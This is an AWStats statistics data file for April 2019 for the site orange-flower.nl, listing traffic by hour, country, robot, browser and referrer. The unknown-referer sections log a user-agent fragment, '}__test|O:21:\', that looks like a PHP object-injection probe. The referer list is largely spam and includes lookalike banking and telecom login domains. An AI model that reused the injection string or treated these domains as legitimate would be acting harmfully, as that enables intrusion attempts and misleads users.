AWSTATS DATA FILE 7.6 (build 20161204)
# If you remove this file, all statistics for date 201904 will be lost/reset.
# Last config file used to build this data file was /etc/awstats/awstats.www.orange-flower.nl.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2003                
POS_TIME 2686                
POS_VISITOR 35558               
POS_DAY 55384               
POS_DOMAIN 3605                
POS_LOGIN 4145                
POS_ROBOT 4300                
POS_WORMS 6337                
POS_EMAILSENDER 6468                
POS_EMAILRECEIVER 6611                
POS_SESSION 56248               
POS_SIDER 56442               
POS_FILETYPES 6746                
POS_DOWNLOADS 7005                
POS_OS 7090                
POS_BROWSER 7492                
POS_SCREENSIZE 10176               
POS_UNKNOWNREFERER 10250               
POS_UNKNOWNREFERERBROWSER 10835               
POS_ORIGIN 11153               
POS_SEREFERRALS 11299               
POS_PAGEREFS 11583               
POS_SEARCHWORDS 29786               
POS_KEYWORDS 29964               
POS_MISC 2350                
POS_ERRORS 30051               
POS_CLUSTER 4001                
POS_SIDER_404 30187               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20190501003758 666 135352 14798333648872
FirstTime 20190401001341
LastTime 20190430200052
LastUpdate 20190501020303 666 0 665 0 0
TotalVisits 1131                
TotalUnique 474                 
MonthHostsKnown 0                   
MonthHostsUnknown 508                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
WindowsMediaPlayerSupport 0 0 0
PDFSupport 0 0 0
JavascriptDisabled 0 0 0
DirectorSupport 0 0 0
RealPlayerSupport 0 0 0
FlashSupport 0 0 0
JavaEnabled 0 0 0
TotalMisc 0 0 0
QuickTimeSupport 0 0 0
AddToFavourites 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 37 40 247433 137 206 1140565
1 30 136 3422106 120 167 546209
2 54 91 2195830 77 130 815501
3 20 20 133390 131 210 899308
4 36 58 491778 84 135 624507
5 39 42 332977 108 191 693000
6 49 70 1860410 93 157 558519
7 92 121 714272 148 231 1189891
8 113 224 4558304 102 171 916824
9 112 407 15977781 112 191 1849440
10 113 245 3762894 136 252 833110
11 53 156 6866620 159 255 1278563
12 101 407 8252259 129 212 776090
13 103 501 5649097 182 290 1421559
14 126 661 10233615 152 264 1169419
15 129 538 7199099 168 292 1433158
16 51 367 5815086 122 355 2142633
17 63 297 7495314 162 500 5110091
18 66 226 5101390 104 357 3469145
19 123 403 10570921 127 238 1592130
20 85 216 7505125 184 237 1390410
21 31 192 7527461 145 199 575280
22 54 218 7954928 141 210 1754497
23 39 156 9793387 106 222 926162
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 21
unknown 565 1497 43963765
us 564 2590 37054770
sa 153 153 44064
nl 98 1081 47798185
kz 80 80 23040
pt 78 78 707400
ru 35 35 20117
ua 33 33 36926
fr 28 47 333766
ca 25 49 479115
au 1 20 252168
gb 17 59 1919413
de 19 19 5472
ng 1 1 9362
lv 1 1 3662
it 2 2 7324
es 3 3 27450
il 1 1 3625
be 1 5 525637
cn 13 33 320364
ch 1 5 125852
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 50
bingbot/ 1000 7221700 20190430204418 71
infobot 751 2096762 20190430153618 123
bingpreview 580 6148251 20190429174605 0
spider 547 7826804 20190430182750 4
Googlebot/ 453 2074416 20190430183304 107
Applebot/ 92 163371 20190430191707 45
YandexBot/ 79 137652 20190429111638 44
seokicks\.de 72 204222 20190427191441 8
MSIE[\x20]6 64 497172 20190430113233 0
oBot/ 46 105260 20190430042310 10
DomainCrawler/ 28 215063 20190404071153 1
^mozilla\/4\.0\s\(compatible;\)$ 9 262323 20190415083925 0
^Mozilla$ 2 708 20190422222123 0
Uptimebot/ 14 4113 20190427224432 3
CCBot/ 18 92616 20190425094646 4
Googlebot\-Image/ 3 0 20190414012855 0
scanner 37 108692 20190430232329 18
linkchecker 29 56169 20190429152511 14
unknown 29 9466 20190430143632 29
PhantomJS 20 252168 20190403234317 0
qwantify 9 56724 20190423005236 3
istellabot/ 2 315 20190423114047 1
curl 1 9306 20190417155103 0
nutch 33 80629 20190408145115 4
no_user_agent 10 48292 20190427113045 5
YisouSpider 6 13414 20190407110047 0
vagabondo 30 224171 20190425220956 2
facebookexternalhit/ 3 177323 20190412195443 0
python 5 14484 20190417083437 0
Konqueror/ 1 3155 20190421004704 0
MegaIndex\.ru/ 28 79472 20190429111215 1
DuckDuckGo\-Favicons\-Bot/ 14 37953 20190428195625 0
DomainStatsBot/ 14 109927 20190419214000 1
MJ12bot/ 14 4928 20190430180304 14
java 1 326 20190403095358 0
DotBot/ 7 65748 20190410001208 4
Exabot/ 25 63751 20190428140325 5
Mail\.RU_Bot/ 15 78470 20190430152749 8
ning 1 49541 20190408171633 0
Wget/ 3 19048 20190417134035 0
AhrefsBot/ 46 106752 20190430174140 25
360Spider 36 118924 20190430115855 4
bot[\s_+:,\.\;\/\\-] 16 160155 20190422225227 0
crawl 10 81876 20190421071422 1
dataprovider\.com 26 184540 20190430204709 2
SemrushBot/ 5 1575 20190417132958 5
ltx71 11 10085 20190429134114 9
(firefox/)([0-9]\.|[0-1][0]\.) 15 40270 20190427145956 4
BLEXBot/ 25 58413 20190409181056 5
Python\-urllib/ 8 56801 20190430164120 2
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 10
css 514 3509170 0 0
js 463 8437281 0 0
gif 138 51613 0 0
ico 53 92661 0 0
xml 3 4761 0 0
png 361 8560753 0 0
jpg 2537 105499564 0 0
html 954 2270156 0 0
pdf 7 359160 0 0
Unknown 762 4876358 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 1
/privacy%20statement.pdf 13 0 661233
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 24
macosx9 12 6
macosx12 58 58
winxp 40 12
ios_ipad 107 12
winnt 1 0
macosx10 11 10
win2003 95 91
win2008 57 57
win7 363 250
winunknown 290 290
macosx11 82 73
linuxandroid 768 69
linux 2234 258
win10 682 260
Unknown 31 25
macosx7 2 2
macosx8 1 1
winlong 89 76
macosx6 1 1
macosx 161 29
win8 34 34
unix 29 4
ios_iphone 507 38
win8.1 137 63
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 130
Unknown 22 21
chrome62.0.3202.94 3 3
safari9.0.2 4 3
up\. 1 1
chrome48.0.2564.109 22 22
chrome40.0.2214.93 1 1
chrome74.0.3729.112 101 14
chrome45.0.2454.93 8 8
firefox62.0 1 1
edge13 4 3
chrome41.0.2228.0 7 7
edge16 54 11
chrome63.0.3239.132 21 1
safari11.0 43 8
opera55.0.2994.44 17 17
chrome73.0.3683.88 29 4
chrome13.0.782.41 2 2
safari12.1 211 20
firefox64.0 1 1
firefox46.0 2 2
iphone 1 0
chrome68.0.3440.75 5 5
opera53.0.2907.99 13 13
msie4.00 91 91
mozilla 5 3
netscape5.0... 1 1
chrome16.0.897.0 1 1
chrome65.0.3325.146 6 6
chrome53.0.2785.143 2 2
safari9.0.3 6 6
chrome49.0.2623.75 2 2
chrome48.0.2564.116 29 28
chrome74.0.3729.108 37 12
chrome55.0.2883.95 25 25
chrome45.0.8923.78 7 1
firefox40.0 3 3
chrome26.0.1410.65 1 1
chrome34.0.1847.137 1 1
opera53.0.2907.68 22 22
chrome63.0.3239.111 21 1
msie2.00 89 89
chrome71.0.3578.99 20 1
chrome49.0.2623.112 2 2
chrome72.0.3626.119 62 13
chrome68.0.3440.84 9 9
firefox52.0 36 27
chrome61.0.3163.79 2 2
firefox22.0 1 1
firefox17.0 6 6
firefox47.0 8 8
firefox44.0 16 15
firefox27.3 4 4
chrome67.0.3396.62 2 2
android 39 2
msie10.0 8 5
chrome36.0.1985.125 16 1
chrome70.0.3538.110 40 2
chrome73.0.3683.75 2 0
msie7.0 22 18
chrome66.0.3359.181 80 80
msie11.0 80 12
msie9.0 36 14
msie8.0 2 2
chrome73.0.3683.90 401 40
wap 5 1
chrome41.0.2272.89 2 2
chrome4.1.249.1036 1 1
chrome68.0.3440.106 1665 126
chrome67.0.3396.87 176 28
opera54.0.2952.54 19 19
chrome51.0.2704.63 2 2
chrome73.0.3683.86 178 18
msie5.00 83 83
netscape5.0 1 1
chrome44.0.2403.89 1 1
safari 59 4
chrome63.0.3239.84 1 1
chrome17.0.963.56 1 1
chrome52.0.2743.116 2 2
chrome40.0.2214.85 42 2
opera54.0.2952.64 20 20
opera54.0.2952.71 4 4
chrome3.0.196.0 1 1
chrome59.0.3071.115 42 2
chrome42.0.2311.90 6 6
opera10.00 1 1
chrome61.0.3163.100 24 24
edge17 90 12
chrome73.0.3683.103 165 23
msie3.00 71 71
chrome58.0.3029.110 7 7
chrome50.0.2661.102 16 16
chrome30.0.1599.101 28 28
firefox26.0 1 1
chrome47.0.2526.106 4 4
chrome65.0.3325.181 265 123
chrome72.0.3626.121 5 2
safari12.0 349 22
chrome60.0.3112.50 20 10
firefox11.0 8 0
firefox53.0 2 2
opera54.0.2952.51 7 7
chrome66.0.3359.117 5 5
firefox42.0 2 2
chrome75.0.3738.0 4 1
chrome5.0.375.99 4 4
opera53.0.2907.106 7 7
safari10.0 21 3
chrome69.0.3497.100 3 3
msie6.00 79 79
chrome71.0.3578.80 126 6
chrome25.0.1364.172 1 1
firefox31.0 26 26
firefox33.0 3 3
firefox65.0 2 2
chrome71.0.3578.98 2 2
safari5.1 2 2
chrome64.0.3282.140 20 1
firefox37.0 2 2
safari9.0 100 14
firefox40.1 3 3
chrome67.0.3396.99 46 46
firefox23.0 1 1
opera11.62 1 1
chrome33.0.1750.152 12 6
msie7.00 74 74
firefox66.0 41 4
chrome60.0.3112.101 3 3
edge18 1 0
chrome67.0.3396.79 11 11
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
}__test|O:21:\ 20190430164051
Ruby 20190419064146
WhatsApp/2.19.81_A 20190402194555
Go-http-client/1.1 20190430200052
Scrapy/1.5.0_(_https://scrapy.org) 20190424105750
Mozilla/5.0... 20190419160950
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20190422075331
Mozilla/5.0_(compatible;_Wappalyzer) 20190410211043
Using_this_for_brand_safety_purposes:_(adrollgroup.com),_and_please_chat_with_usfor_any_questions 20190422051255
Mozilla/4.0_(compatible;_ms-office;_MSOffice_16) 20190417190310
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 6
Go-http-client/1.1 20190430200052
Scrapy/1.5.0_(_https://scrapy.org) 20190424105750
}__test|O:21:\ 20190430164051
WhatsApp/2.19.81_A 20190402194555
Ruby 20190419064146
com.google.GoogleMobile/42.0.0_iPad/9.3.5_hw/iPad2_4 20190413231730
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 532 716
From1 6 6
From2 89 99
From3 628 2026
From4 464 2945
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 8
duckduckgo 1 1
t_online_catchall 6 6
www_google_be 0 1
www_google_com 43 47
www_google_com_hk 6 6
bing 4 6
www_google_nl 28 31
yandexru 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 388
http://orangeflower.eu/contact 61 61
http://orangeflower.eu/index 61 61
http://orangeflower.eu 9 207
http://artlife.rv.ua 8 8
https://www.pamyatniki-in-kiev.com.ua 7 7
http://uzinform.com.ua/index.php 6 6
http://www.look.com.ua 6 6
https://business-sberbank.ru 5 5
https://belgorod.med24.online/landing/narkolog_na_dom/ 5 5
https://es-pfrf.ru 5 5
http://carlines.ru/modules/news/index.php 1 1
http://uchinfo.com.ua/olimp/ 1 1
http://www.bettergames.ru/clicker.php 1 1
http://hundejo.com 1 1
http://asupro.com 3 3
https://profit-x.ru 2 2
https://ps-spb.com/uslugi/protivopozharnyj-vodoprovod.html 1 1
https://miniature.io 2 2
https://l-digital.ru/portfolio/height/ 1 1
https://nashkomp.ru/category/wechat 1 1
https://dontimes.news 1 1
http://vzyatkredit.com/podzalogavto/ 1 1
https://tuvaonline.ru/person/ 1 1
http://www.so.com/link 1 1
https://webtop.co.ua/portfolio 1 1
http://www.remont-garaga24.ru/services/ventilyatsiya-garazha/ 1 1
https://urdis.ru/ocenka-skladskoj-nedvizhimosti 2 2
http://chtokak.ru/category/work/ 1 1
https://psiholog-lebedeva.com/semeynyiy-psiholog-zaporozhye.html 1 1
https://bannyi-den.ru/stroitelstvo-bani/lestnitsa/ 1 1
https://www.affiliate-programs.biz 1 1
https://slice.biz.ua/zatochka-instrumentu 1 1
http://xn--g1ah8c.xn--p1ai/category/%d0%b4%d0%b5%d0%bd%d1%8c%d0%b3%d0%b8/ 2 2
https://mosfilter.ru/category/brand-aquario_48/nasosy_131.html 1 1
http://popularperson.info/pevtsy-i-muzykanty 1 1
http://v-okne.by/zamena-remont-steklopaketov-minsk 1 1
https://a-to-z-interiors.com 1 1
http://chtokak.ru 1 1
https://fiksn.ru/uslugi_cat/rieltorskie-uslugi/ 2 2
https://dvk-stroi.ru/installation-soft-tiles 1 1
https://smt4.ru/list-mednyj.html 1 1
http://kubiq.ru/portfolio/ 1 1
http://lviv.sq.com.ua/ukr/news/novini/ 2 2
http://pizza-imperia.com 1 1
http://beregynya.org/275/281 1 1
https://animals.wiki/pink-fairy-armadillo/ 1 1
https://www.beton-area.com/pech-kamin-dlya-zagorodnogo-doma.html 1 1
http://psy-dm.ru/online.html 1 1
http://kubiq.ru/nashi-uslugi/ 1 1
http://orangeflower.eu/php/form-to-email.php 1 1
https://animals.wiki/malayan-colugo/ 1 1
https://kabinet-tele2.ru 2 2
https://dodoc.kz/specialization/mammolog 1 1
https://mosfilter.ru/result/brand-belamos_2/bytovye-nasosy.html 1 1
https://www.water-pumps.ru/catalog/teplovye-zavesy_156.html 1 1
https://smt4.ru/nerzhaveyushhie-elementy-truboprovodov.html 1 1
https://yourface.by/category/utrafiolet-protection/ 1 1
http://torextambov.ru/kontakty/ 1 1
http://worldtranslation.org/news/19-health/ 2 2
https://www.magik.vn.ua/poligrafiya/shyrokoformatny-druk 1 1
https://xn----dtbalmxqcnlo.xn--p1ai/category/%d0%b4%d0%b0%d1%87%d0%b0/ 2 2
https://dvk-service.ru/service/remont_gostin 1 1
https://rvd.center/dvig-cummins-shanghai.html 1 1
https://www.wstrotuar.ru/services/paving-tile-vibro/trotuarnaya-plitka-bruk/ 2 2
https://sharestory.me/mastering-moon/ 1 1
https://newtvnews.ru/auto/ 1 1
http://www.remont-garaga24.ru/services/betonirovanie-polov/ 1 1
http://artlife70.ru/funkcionalnoe-pitanie/ 1 1
http://poltava.sq.com.ua/rus/news/polezno_znat/ 1 1
https://www.water-pumps.ru/catalog/teploventilyatory_157.html 1 1
http://worldtranslation.org/news/3-business/ 1 1
https://dvk-stroi.ru/metal-cherepiza 1 1
http://www.remont-garaga24.ru/services/gidroizolyatsiya-kryshi-garazha/ 1 1
https://pronashkomp.ru/category/kadrirovanie 1 1
https://dontimes.news/donbass/ 1 1
https://sib-bur19.ru/hk.html 4 4
https://belokna31.ru/product-category/plastikovye-okna/ 2 2
http://znatprovse.ru/category/kak-pohudet 1 1
http://artlife70.ru/programma-oleopren-beauty-derm/ 1 1
http://uchinfo.com.ua/myarticle/ 1 1
https://krevetok.net/goods/benibachi_zero_a.html 1 1
https://testbot.ru/dosha/ 2 2
http://torexlipetsk.ru/dveri/professor-4/ 1 1
http://happy-galla.ru/kuda-poyti 1 1
http://www.love-rap.ru/load 1 1
https://trubyda.ru/gazovye 1 1
https://lina777.com 3 3
https://ru-lk-rt.ru 1 1
https://cabinet-mts.ru 1 1
https://www.bufetout.ru/gallery-viezdnoi-event/photo-kofe-breiki/ 1 1
https://silastroy.com 1 1
http://popularperson.info/znamenitosti-na-tv 1 1
https://tuvaonline.ru/economy/ 1 1
https://kabinet-ttk.ru 2 2
https://testbot.ru/work/ 1 1
http://beregynya.org/277/294 1 1
https://www.archidizain.ru/2019/02/ 1 1
https://www.water-pumps.ru/catalog/promyshlennye-glubinnye-nasosy_326.html 1 1
https://carivka.com.ua/corporative/svadba.html 2 2
https://dverimegapolis.ru/dveri-orekh/ 1 1
https://pamjatnik.com.ua/productions 4 4
http://uchinfo.com.ua/soft/ 1 1
https://belokna31.ru/nasha-produkcia/ 1 1
http://happy-galla.ru/gostinica-pushkinskaya 1 1
https://metaphysican.com/sport/ 1 1
http://www.bettergames.ru/ever-after-high.php 1 1
https://krevetok.net/goods/sl_aqua_more_water_nitrifying_bacteria_for_sulawesi_shrimp.html 1 1
https://chistoastana.kz/home/kover/neylon/ 1 1
https://kabinet-mts.ru 1 1
http://worldtranslation.org 1 1
https://teman.com.ua/zapchasti/kuzovnyie-detali 1 1
http://rodina-portal.ru/v-mire 1 1
http://pupilby.net 1 1
https://trubyda.ru/soedinenie 1 1
http://updowntoday.com/links-en/290001-300000-en 1 1
https://sib-bur19.ru 1 1
http://xxmusic.net/disco/ 1 1
http://nsk-kinno.ru/uzhasy/ 1 1
https://mycoffeemachine.ru/services/kofemashin/podklyuchenie-kofemashin/ 1 1
https://serkan-aygin.ru/obl/peresadka/novosibirsk/ 1 1
https://www.albion.biz.ua/ru/product-category/tehnika/razbrasyivateli-udobreniy/ 1 1
http://forum.orange-flower.nl 1 1
https://malinaexpert.ru/sorta-maliny-dlya-srednej-polosy-rossii/ 1 1
http://www.bettergames.ru/russian-games.php 1 1
https://kremonty.ru/stena/ 1 1
https://meblevozka.kiev.ua/office-pereezd.htm 1 1
https://proapril.ru/o-nas 1 1
https://mfc-oficialnyj-sajt.ru/kak-vstat-v-ochered-v-detskij-sad-cherez-mfc 1 1
https://metaphysican.com/psihologiya/ 1 1
https://urdis.ru/ocenka-stoimosti-doli-v-ooo 1 1
http://www.remont-garaga24.ru 1 1
https://handy-service.pro 3 3
https://profit-x.ru/top-birzh-kriptovalyut-na-russkom.html 2 2
https://lifespeaker.ru/tehnika 1 1
https://onlinewot.ru/object-279-r/ 1 1
https://bannyi-den.ru 1 1
https://incacar.com/cpo/cars/state-OH/city-Russellville/ 1 1
https://carivka.com.ua 2 2
https://trubyda.ru/drenazhnye 1 1
https://mosfilter.ru/result/povysitelnye-promyshlennye-nasosy.html 1 1
https://smt4.ru/krug-mednyj.html 1 1
https://urdis.ru/ocenka-kompyuterov 1 1
http://rapdown.net/koncerty/ 1 1
https://lianamebel.ru/shkafyi/ 1 1
https://mosfilter.ru/catalog/brand-wilo_82/poverhnostnye-nasosy.html 1 1
https://lifespeaker.ru/kino 1 1
https://optstroy.kz/kirpich/ 3 3
http://magia-mozaiki.ru/catalog/golubaya 1 1
https://kazuki.su/sushi-i-rolly/ 1 1
https://brendof-club.com/catalog/bags/ 1 1
https://carivka.com.ua/corporative/banket.html 1 1
https://online-akbars.ru 2 2
https://kazuki.su 1 1
https://mirtonometrov.ru/kontakty/ 1 1
http://nsk-kinno.ru 2 2
http://gotovim.mybloge.net 1 1
https://www.trasplantecapilarturquia.com/trasplante.html 1 1
https://meblevozka.kiev.ua/Movers.htm 2 2
http://updowntoday.com/links-en/820001-830000-en 1 1
https://www.water-pumps.ru/catalog/radiatory_142.html 1 1
http://lviv.sq.com.ua/ukr/news/varto_znati/ 1 1
http://artlife70.ru/elite-cup/ 1 1
http://xn--90acau6ackhj2gf.xn--p1ai/otzyvy/ 1 1
https://meblevozka.kiev.ua/pianino.htm 1 1
https://www.childrenshospitaloakland.org/main/events/4286.aspx 1 1
http://bezremonta.net/landshaft/ 1 1
https://money-partner.ru/bitcoin/ 1 1
http://www.gbusiness.se 1 1
https://kabinet-uchi.ru 1 1
https://ashdodrus.com/category/novosti-ashdoda/ 1 1
https://krevetok.net/goods/benibachi_active_water.html 1 1
http://v-okne.by/regulirovka-okon-pvc-steklopaketov 3 3
https://profit-x.ru/bitkoin-obmenniki.html 1 1
https://www.beton-area.com/iz-chego-postroit-dom.html 1 1
https://kremonty.ru/remont-vannoy/ 1 1
http://xn--80aaic9ahigbz7m.xn--p1ai/item/262-bochka-dubovaya 1 1
https://zerkalo31.ru 1 1
http://updowntoday.com/links-en/280001-290000-en 1 1
http://silastroy.com 1 1
http://norwaylife.net 1 1
http://magia-mozaiki.ru/catalog/iz-kamnya-i-keramiki 1 1
https://meblevozka.kiev.ua/gruzovoe-taxi.htm 1 1
http://znatprovse.ru/category/muzhchina-i-zhenshhina 1 1
https://krevetok.net/goods/lowkeys_zeolite.html 1 1
http://torexbelgorod.ru/kontakty/ 1 1
https://dontimes.news/obshhestvo/ 1 1
https://dvk-service.ru/potolokwork 1 1
https://malinaexpert.ru/remontantnaja-malina-sorta-zhuravlik-zhuravushka/ 1 1
https://metalloy.ru/stanki/dlya-kovki 1 1
https://ps-spb.com/uslugi/pozharnaya-signalizaciya.html 1 1
https://www.bufetout.ru/catering/furshet/ 1 1
https://l-digital.ru/feedback/ 1 1
https://mialoan.com/ru/ 1 1
http://updowntoday.com/links-en/700001-710000-en 1 1
http://pupilby.net/news/ 1 1
https://zerkalo31.ru/product-category/zerkala-dlya-vannoy-komnatyi/ 1 1
https://slice.biz.ua/stryzhka-i-ukladka/feny-ta-nasadky 1 1
https://dverimegapolis.ru/shponirovannye-dveri/ 1 1
http://flowerspeterburg.ru 1 1
https://onlinewot.ru/t-34-3/ 2 2
https://www.magik.vn.ua/magik-u-tts-bastyliya 1 1
https://www.beton-area.com/klinkernaya-plitka-dlya-vnutrennei-otdelki.html 1 1
https://www.silastroy.com 1 1
https://mfc-oficialnyj-sajt.ru/kak-proverit-gotovnost-dokumentov-v-mfc 1 1
https://slice.biz.ua/ru/strizhka-i-ukladka/mashynky-dlia-stryzhky-volos 1 1
https://chistoastana.kz/home/kresla/ 1 1
http://xn--g1ah8c.xn--p1ai 1 1
https://meblevozka.kiev.ua 1 1
https://meblevozka.kiev.ua/gruzoperevozka.htm 2 2
https://www.facebook.com 1 1
http://beregynya.org/257/283 2 2
https://urdis.ru/osparivanie-kadastrovoj-stoimosti/ 1 1
https://metalloy.ru/obrabotka/abrazivnaya 1 1
http://karyerborisovo.ru/torf.html 1 1
http://samara-comfort.ru/buzuluk 1 1
https://www.rodecs.com.ua/product-details/shruder-delis-mr5006w 1 1
http://www.vdetstve.net 2 2
http://updowntoday.com/links-en/550001-560000-en 1 1
http://amberbeach.info/255-sharm-el-sheyh-obnosyat-zaborom-radi-bezopasnosti-turistov.html 1 1
https://tvoiznaniya.com/algebra/ 1 1
https://sharestory.me/counterfeit-goods/ 1 1
https://money-partner.ru 1 1
https://www.archidizain.ru/p/blog-page.html 1 1
https://www.beton-area.com/stekloplastikovaya-armatura.html 1 1
https://onlinewot.ru/e-25/ 1 1
http://worldtranslation.org/news/12-cinema/ 1 1
http://happy-galla.ru/minigostinitsa-chehovskaya 1 1
http://www.bettergames.ru/boys.php 1 1
https://chistoastana.kz/home/matras/ 1 1
http://xn--80aaic9ahigbz7m.xn--p1ai/baza/viski 1 1
http://xxaudio.net/sborniki/ 1 1
https://metaphysican.com/deti/ 1 1
http://www.bettergames.ru/brain.php 1 1
http://updowntoday.com/links-en/130001-140000-en 1 1
https://nashkomp.ru/category/telegram 1 1
https://taxi-sova.com.ua/onlajn-zakaz/ 1 1
https://optstroy.kz/gazoblok/ 1 1
https://krevetok.net/goods/naturprodukt.html 1 1
https://tuvaonline.ru/society/ 1 1
http://www.bettergames.ru/kissing.php 1 1
https://metalloy.ru/obrabotka/rezba 1 1
https://teman.com.ua/select/motor_oils 1 1
https://russkaja-skazka.ru 1 1
https://testbot.ru/narcissizm/ 1 1
https://online-raiffeisen.ru 5 5
http://xxmusic.net/sborniki/ 1 1
https://pokupaylegko.ru/shop/tv-shop/beauty_and_health/ 1 1
https://vosstanovim.by 1 1
http://www.newtvnews.ru 1 1
https://www.magik.vn.ua/gotovi-rishennya-vid-magik/dlya-tvorchosti/ 1 1
https://www.albion.biz.ua 2 2
http://znatprovse.ru/category/goroskop-ljubvi 1 1
https://newtvnews.ru/social/ 1 1
http://happy-galla.ru/chastnie-mini-gostinitsi 1 1
https://lukojl-club.ru 1 1
http://xn---24-edd4a2ahb1ak.xn--p1ai/world 1 1
https://webtop.co.ua/technology 1 1
https://kabinet-mos.ru 5 5
http://updowntoday.com/links-en/170001-180000-en 1 1
http://norwaylife.net/lions/ 2 2
https://carivka.com.ua/corporative.html 2 2
https://advokat-expert-prava.com.ua 1 1
http://mifepriston.info/clauses/issledovaniya--preryvaniya-beremennosti-na-rannikh/ 1 1
https://www.wstrotuar.ru/services/concrete-products/ 1 1
https://www.prjadko.kiev.ua 2 2
https://www.rodecs.com.ua/product-details/kludi-zenta-386708675 1 1
http://happy-galla.ru/nedorogie-oteli-moskvi 1 1
http://updowntoday.com/links-en/940001-950000-en 1 1
https://www.bazanavuokse.ru/otzyvy/otzyv-ot-larisy/ 1 1
https://mycoffeemachine.ru/services/remont-kofemashin/ne-greet-vodu/ 2 2
https://slice.biz.ua/stryzhka-i-ukladka/mashinki-dlya-strizhki-volossya 1 1
https://kremonty.ru/elektrika/ 1 1
https://testbot.ru/married/ 1 1
http://potolochki.com/sovetyi-vam 1 1
https://www.bufetout.ru/catering/kejtering-na-vystavku/ 1 1
http://magia-mozaiki.ru/catalog/iz-stekla-keramiki-i-metalla 1 1
https://mosfilter.ru/catalog/nasosy-dlya-prudov-i-fontanov_0.html 1 1
https://www.bufetout.ru/catering/provedenie-kofe-breikov/ 3 3
https://bannyi-den.ru/poleznye-sovety/ 1 1
https://malinaexpert.ru/osnovnye-osobennosti-remontantnoj-maliny/ 1 1
https://chistoastana.kz/home/chistomebel/ 1 1
http://www.silastroy.com 1 1
http://www.expotelevision.ru/uslugi/3d-animacija/stoimost-3d-animacii/ 1 1
https://onlinewot.ru/at-15a/ 1 1
http://poltava.sq.com.ua/rus/news/zozh/ 1 1
http://www.remont-garaga24.ru/services/zamena-remont-kryshi-garazha/ 1 1
https://smt4.ru/truby-kruglye-nerzhaveyushhie.html 1 1
http://xn--g1ah8c.xn--p1ai/category/%d1%80%d0%b0%d0%b1%d0%be%d1%82%d0%b0-%d0%b8-%d0%ba%d0%b0%d1%80%d1%8c%d0%b5%d1%80%d0%b0/ 1 1
https://metaphysican.com/rukodelie/ 1 1
https://proapril.ru/otzyvy 1 1
https://newtvnews.ru/economics/ 1 1
https://pokupaylegko.ru/shop/podarki-dlja-detejj/goods-for-the-holiday/ 1 1
http://torexlipetsk.ru/dveri/super-omega-10/ 1 1
https://teman.com.ua/select/fuel 1 1
https://rvd.center/zapchasti-xcmg.html 2 2
https://newtvnews.ru 1 1
https://www.newtvnews.ru 1 1
https://www.albion.biz.ua/ru/product-category/tehnika/traktoryi/ 2 2
https://torgovoeoborudovanie.com.ua/g4653710-frigobary-barnye-holodilniki 1 1
https://russkaja-skazka.ru/slushat-audioskazki/ 2 2
http://torextambov.ru/about/otzyvy/ 1 1
http://nsk-kinno.ru/filmy-pro-prizrakov/ 1 1
https://pronashkomp.ru 3 3
https://pro-forex.online/category/all-markets-view/ 1 1
https://www.fermerstvo.org.ua/travnevi-robotu-v-sady.html 1 1
https://laminatkd.ru/catalog/massivnaya_doska/ 1 1
https://xn----dtbalmxqcnlo.xn--p1ai/category/%d1%81%d0%be%d0%b2%d0%b5%d1%82%d1%8b-%d0%bf%d0%be-%d0%b4%d0%be%d0%bc%d1%83/ 1 1
https://dodoc.kz/specialization/neonatolog 1 1
https://www.wstrotuar.ru/services/trotuarnaya-plitka-dlya-dachi/ 1 1
http://layf.info/prikoly 1 1
https://psiholog-lebedeva.com/psihoterapevt-zaporozhye.html 1 1
https://login-tinkoff.ru 1 1
https://urdis.ru/ocenka-ushcherba-posle-pozhara 1 1
https://lifespeaker.ru/obrazovanie 1 1
https://smt4.ru/truba-alyuminievaya.html 1 1
https://money-partner.ru/ethereum/ 1 1
https://handy-service.pro/remont-planshetov/ 1 1
http://mifepriston.info/clauses/abort-odni-iz-samykh-vostrebovannykh-sposobov-prer/ 1 1
https://xn--80ah0ad8a.xn--p1acf/product-category/silovaya-tehnika/vodyanye-nasosy/ 1 1
https://handy-service.pro/katalog-tovarov/ 1 1
